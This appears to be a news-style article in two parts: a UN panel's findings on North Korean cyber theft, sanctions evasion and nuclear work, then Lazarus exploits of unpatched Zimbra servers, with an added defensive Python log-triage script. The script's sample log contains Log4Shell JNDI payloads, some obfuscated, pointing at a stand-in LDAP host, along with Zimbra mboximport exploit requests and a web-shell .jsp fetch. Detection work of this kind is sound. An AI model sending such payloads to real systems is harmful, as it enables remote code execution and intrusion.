
Global Authorities Examine 58 Cyberattacks Linked to North Korea, Valued at $3 Billion

 


North Korean sanctions monitors have been investigating dozens of possible cyberattacks by the regime, which are believed to have raised $3 billion to fuel the state's nuclear weapons program, according to excerpts released from an unpublished report by the UN. 

In the executive summary of a new report submitted to the United Nations Security Council obtained Friday by The Associated Press, a panel of experts stated that the number of cyberattacks by North Korean hacking groups that report to the Reconnaissance General Bureau, North Korea’s primary foreign intelligence organization, is continuing to be high. 

This report covers the period from July 2023 to January 2024, and it is based on contributions made by unidentified United Nations representatives. A report sent to the council of 15 nations, compiled from member nations and other sources, was sent in response to the high tensions in the region caused by North Korean leader Kim Jong Un. 

As a result, the United States, South Korea, and Japan have increased their combined military exercises in response to his threat to annihilate South Korea if provoked and to his escalating weapons demonstrations. Amid the increased military and political tensions on the Korean Peninsula, the experts said North Korea "continued to flout (U.N.) sanctions," further developed its nuclear weapons, and produced nuclear fissile materials, the weapons' key ingredients.

The experts said the light-water reactor at North Korea's main nuclear complex at Yongbyon appeared to be operational. There are suspicions that the North may use it as a new source of fissile material for nuclear weapons; the South Korean defence minister said in late December that the reactor is likely to become operational by the summer.

The 5-megawatt reactor at Yongbyon has been producing weapons-grade plutonium for many years. The light-water reactor would be a useful additional source of bomb fuel, and observers have pointed out that, with its larger capacity, it can produce more plutonium.

Furthermore, Yongbyon has its own facility for enriching uranium, which can enrich uranium up to 99%. According to the panel, North Korea is likely preparing to conduct its seventh nuclear test from Punggye-ri, which would mark the first nuclear test conducted there since 2017. The panel said it has been working on monitoring activities at the nuclear test site. 

Estimates of North Korea's nuclear arsenal range from 20-60 weapons to more than 100, depending on who is doing the counting. Experts think North Korea is capable of adding between six and 18 bombs per year. Kim Jong Un has repeatedly promised to build more nuclear weapons and to introduce high-technology weapons to deal with what he calls intensifying U.S. hostility since his diplomacy with the U.S. collapsed in 2019.

According to the panel, at least seven ballistic missiles were launched by the Democratic People's Republic of Korea during the six months that ended in January, including one intercontinental ballistic missile, one intermediate-range missile, and five short-range missiles. That was one of the highest numbers of launches the North has ever made in such a period, according to the panel.

Experts said Sunday that the DPRK has successfully put a military observation satellite into orbit, following two failed attempts. As part of its military arsenal, the North has also modified an old diesel submarine so that it can be used as a tactical nuclear attack submarine.

The monitoring panel overseeing U.N. sanctions against North Korea has observed persistent breaches by the DPRK. The country, in defiance of Security Council resolutions, is found to illicitly import refined petroleum products. 

To circumvent maritime sanctions, the DPRK employs a blend of obfuscation techniques. In the year 2023, the recorded trade volume exceeded that of 2022, encompassing a diverse range of consumer goods. Some of these items, deemed luxury goods and prohibited by U.N. sanctions, were included. 

The panel is actively probing reports from member states regarding the DPRK's potential involvement in the arms and ammunition trade, a clear violation of U.N. sanctions. Recent accusations from the United States, Ukraine, and six allies assert Russia's utilization of North Korean ballistic missiles and launchers in devastating aerial attacks against Ukraine, violating U.N. sanctions. South Korea's military, in November, suspected North Korea of exporting various armaments, including short-range ballistic missiles and anti-tank missiles to Russia, contravening U.N. sanctions. 

Throughout the last six months, discernible trends indicate the DPRK's focus on targeting defence companies and supply chains, as well as increased collaboration in infrastructure and tools. The panel has also delved into reports of numerous DPRK nationals working abroad in sectors such as information technology, restaurants, and construction, generating income in violation of U.N. sanctions. 

Additionally, the DPRK persists in accessing the international financial system for illicit financial operations. While U.N. sanctions are designed to spare ordinary North Koreans, the panel acknowledges unintentional repercussions on the humanitarian situation and aspects of aid operations. Nevertheless, the precise impact of sanctions relative to other factors remains challenging to discern.

DPRK Uses Unfixed Zimbra Devices for Spying on Researchers


State-sponsored hackers exploit unpatched Zimbra devices

A recent series of compromises that exploited unpatched Zimbra devices was an operation sponsored by the North Korean government and aimed to steal intelligence from a collection of private and public medical and energy sector researchers. 

Analysts with W labs explained in a new report that, because of an overlap in techniques and thanks to a mistake by one of the threat actors, they attributed the recent series of cyber incidents against unpatched Zimbra devices to the Lazarus group, a well-known cybercriminal group sponsored by the North Korean government.

A joint report by NSA and Central Security service said "DPRK cyber actors have been using cryptocurrency generated through illicit cybercrime activities to procure infrastructure such as IP addresses and domains. The actors intend to conceal their affiliation and then exploit common vulnerabilities and exposures (CVE) in order to gain access and escalate privileges on targeted networks to perform ransomware activities. Recently observed CVEs include remote code execution in the Apache Log4j software library (also known as "Log4Shell") and remote code execution in various SonicWall appliances."

Lazarus ran a campaign using unpatched Zimbra devices

Lazarus ran this campaign and other similar intelligence-gathering operations until the end of 2022. The experts named the campaign "No pineapple" after an error message produced by the malware during their investigation. The threat actors quietly stole around 100 GB of data, without running any destructive campaign or disrupting information.

Security teams running unpatched, Internet-connected Zimbra Collaboration Suite (ZCS) can assume they are compromised and should take immediate detection and response action. 

A recent security alert by CISA flagged active Zimbra exploits for CVE-2022-24682, CVE-2022-27924, and CVE-2022-27925, which are being chained with CVE-2022-37042, and CVE-2022-30333. 

The cyber attacks lead to remote code execution (RCE) and access to the Zimbra platform. 
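The advisory text above tells security teams to assume compromise and start detection work, and the NSA quote earlier names Log4Shell as another CVE these actors exploit. The script below is an added example (not code from the page, CISA, NSA or the labs cited) showing what a first-pass log triage for both could look like: it parses combined-format web access logs, flags Log4Shell-style JNDI lookup strings (including the common nested-lookup obfuscation), flags POSTs to the Zimbra mboximport endpoint, and escalates a source that follows such a POST with a request for a `.jsp` file. The endpoint path is taken from public advisories on CVE-2022-27925 and CVE-2022-37042, not from this page, and should be confirmed against the vendor and CISA write-ups; the log lines are constructed for the example.

```python
"""First-pass access-log triage for the Zimbra and Log4Shell indicators discussed above.

Added example, not from the page. Heuristic only: it is meant to surface lines for a
human analyst, not to replace patching or a full incident-response process.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Combined log format: src ident user [time] "METHOD PATH PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Log4Shell payloads are often nested, e.g. ${${lower:j}ndi:...}; OBFUSCATION_RE
# unwraps single-character lookups such as ${lower:j} or ${::-j} to the bare character.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
OBFUSCATION_RE = re.compile(r"\$\{(?:[a-z]+:|::-)([^{}$])\}", re.IGNORECASE)

# Endpoint associated with CVE-2022-27925 / CVE-2022-37042 in public advisories
# (assumption: confirm against vendor and CISA documentation; not stated on this page).
MBOXIMPORT_PATH = "/service/extension/backup/mboximport"

# Constructed sample log; the IPs are documentation ranges, not real indicators.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Feb/2023:08:14:02 +0000] "POST /service/extension/backup/mboximport HTTP/1.1" 401 0 "-" "python-requests/2.28.1"
203.0.113.10 - - [10/Feb/2023:08:14:03 +0000] "POST /service/extension/backup/mboximport HTTP/1.1" 200 0 "-" "python-requests/2.28.1"
203.0.113.10 - - [10/Feb/2023:08:14:09 +0000] "GET /zimbraAdmin/tmp/x.jsp HTTP/1.1" 200 57 "-" "python-requests/2.28.1"
198.51.100.7 - - [10/Feb/2023:08:15:41 +0000] "GET /zimbra/ HTTP/1.1" 200 8191 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Feb/2023:08:15:42 +0000] "GET /zimbra/?q=${jndi:ldap://198.51.100.99/a} HTTP/1.1" 200 8191 "-" "${${lower:j}ndi:ldap://198.51.100.99/a}"
192.0.2.44 - - [10/Feb/2023:08:16:00 +0000] "POST /service/soap/AuthRequest HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
"""


@dataclass
class Finding:
    src: str
    rule: str
    severity: str
    line: str


def normalize_lookup(text: str) -> str:
    """URL-decode and repeatedly unwrap single-character lookups until stable."""
    text = unquote(text)
    while True:
        unwrapped = OBFUSCATION_RE.sub(r"\1", text)
        if unwrapped == text:
            return text
        text = unwrapped


def contains_jndi(text: str) -> bool:
    """True if the field carries a JNDI lookup after de-obfuscation."""
    return bool(JNDI_RE.search(normalize_lookup(text)))


def triage(log_text: str) -> list[Finding]:
    """Return findings in log order; sources that POST to mboximport are tracked so a
    later .jsp request from the same source is escalated."""
    findings: list[Finding] = []
    mboximport_sources: set[str] = set()
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw)
        if not m:
            findings.append(Finding("?", "unparsed_line", "info", raw))
            continue
        src, method, path = m["src"], m["method"], m["path"]
        bare_path = path.split("?", 1)[0]
        if any(contains_jndi(f) for f in (path, m["referer"], m["ua"])):
            findings.append(Finding(src, "log4shell_jndi_lookup", "high", raw))
        if method == "POST" and bare_path == MBOXIMPORT_PATH:
            mboximport_sources.add(src)
            findings.append(Finding(src, "zimbra_mboximport_post", "medium", raw))
        elif src in mboximport_sources and bare_path.lower().endswith(".jsp"):
            findings.append(Finding(src, "jsp_request_after_mboximport", "critical", raw))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.severity:8}] {f.rule:30} {f.src:15} {f.line[:80]}")
```

The mboximport rule deliberately fires on the 401 as well as the 200, because a failed attempt is still worth knowing about on a host that should not see that endpoint from the Internet at all; the escalation to `critical` only happens once the same source comes back for a `.jsp`, which is the sequence consistent with a dropped web shell rather than a scanner.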

Unfixed Zimbra devices can affect sensitive info

The consequences can be serious, both for the protection of sensitive information and for defending against email-based follow-on threats. ZCS is a suite of business communication services that consists of an email server and a Web client for accessing messages via the cloud.

CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC) strongly suggest administrators and users apply the guidelines in the recommendations of the cybersecurity advisory to defend their organization's systems against malicious cyber operations. 

"NSA and the other authoring agencies urge all critical infrastructure entities and organizations, including the Healthcare and Public Health (HPH) Sector, and the Department of Defense and Defense Industrial Base, to apply the mitigations listed in this advisory," said NSA.